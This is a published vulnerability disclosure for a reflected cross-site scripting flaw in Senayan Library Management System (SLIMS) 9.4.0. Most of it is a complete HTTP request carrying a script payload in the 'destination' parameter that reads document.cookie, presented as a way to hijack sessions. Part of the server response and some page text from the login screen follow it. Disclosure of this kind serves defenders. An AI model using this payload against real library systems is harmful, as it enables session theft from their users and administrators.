Open Source Library Management System

`## Title: Senayan Library Management System v9.4.0 a.k.a SLIMS 9 XSS-Reflected- PHPSESSID Hijacking ## Author: nu11secur1ty ## Date: 12.08.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://slims.web.id/web/news/rilis-9.4.0/ ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.4.0 ## Description: The value of the `destination` request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload zbuip">jgoihbmmygl was submitted in the destination parameter. This input was echoed unmodified in the application's response. The attacker can hijack the session of some users of the system. ## STATUS: HIGH Vulnerability [+] Payload: ```GET GET /slims9_bulian-9.4.0/index.php?p=member&destination=zbuip%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3ejgoihbmmygl&memberID=admin&memberPassWord=password&_csrf_token_645a83a41868941e4692aa31e7235f2=6a50886006f02202a6dac5cfa07bcbfb1e2a6e84&logMeIn=Login HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: SenayanMember=82qkie4ai1alsk0gtbge7rc48m Origin: http://pwnedhost.com Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/slims9_bulian-9.4.0/index.php?p=member Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` [+] Response: ```HTTP/1 HTTP/1.1 200 OK Date: Thu, 08 Dec 2022 18:43:20 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30 X-Frame-Options: SAMEORIGIN X-Powered-By: PHP/7.4.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-XSS-Protection: 1; mode=block Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 30590 Open Source Library Management System | Senayan

Search by :

ALL Author Subject ISBN/ISSN Advanced Search

Last search:

Library Member Login

Please insert your member ID and password given by library system administrator. If you are library's member and don't have a password yet, please contact library staff.

Query Builder